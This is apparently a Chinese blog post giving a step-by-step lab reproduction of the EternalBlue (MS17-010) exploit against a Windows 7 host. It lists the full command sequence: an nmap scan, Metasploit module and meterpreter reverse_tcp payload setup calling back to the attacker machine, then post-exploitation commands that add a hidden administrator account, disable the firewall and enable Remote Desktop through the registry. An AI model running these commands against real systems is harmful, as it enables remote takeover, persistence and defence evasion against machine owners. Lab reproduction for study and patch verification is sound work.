1. 程式人生 > 其它 >記一次簡單的永恆之藍漏洞復現

記一次簡單的永恆之藍漏洞復現

注:針對的系統是Windows7 64位作業系統,其他作業系統請自行測試。

一.測試環境:

kali linux:192.168.121.128 (攻擊機)

win7:192.168.121.130 (目標靶機)

二.攻擊前的準備

1.檢視kali的ip地址

命令:ifconfig

2.使用nmap掃描區域網內的所有主機(ms17_010漏洞的最基本要求是需要開啟445埠)

命令:nmap 192.168.121.1/24

可以看到445埠開著,那就可以開始我們的攻擊利用

3.開啟Metasploit框架

命令:msfconsole

4.搜尋ms17_010漏洞(永恆之藍)

命令:search ms17_010

5.使用永恆之藍漏洞

命令:use exploit/windows/smb/ms17_010_eternalblue

6.顯示所需要的引數

命令:show options

三.設定攻擊引數

1.設定目標主機

命令:set rhost 192.168.121.130

2.設定攻擊載體(一個好用的攻擊模組)

命令:set payload windows/x64/meterpreter/reverse_tcp

3.設定攻擊機ip,用來攻擊成功之後,監聽被開放的目標電腦的埠(一開始查的kali的ip)

命令:set lhost 192.168.121.128

4.檢查引數是否配置正確

命令:show options

四.攻擊

命令:run

五.利用

1.獲取截圖

命令:screenshot

2.靶機shell(以管理員身份開啟靶機的cmd)

命令:shell

六.拿到shell後可進行的操作(Dos命令)

1.建立一個叫szsec,密碼為123456的使用者

命令:net user szsec 123456 /add

2.對剛才建立的使用者提權為管理員

命令:net localgroup administrators szsec /add

3.關閉防火牆

命令:netsh firewall set opmode mode=disable

4.檢視開啟的埠

命令:netstat -ano

5.開啟3389埠

命令:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

七.遠端桌面

1.使用win10的遠端桌面管理

2.遠端桌面成功


最後:網際網路不是法外之地,大家且行且珍惜~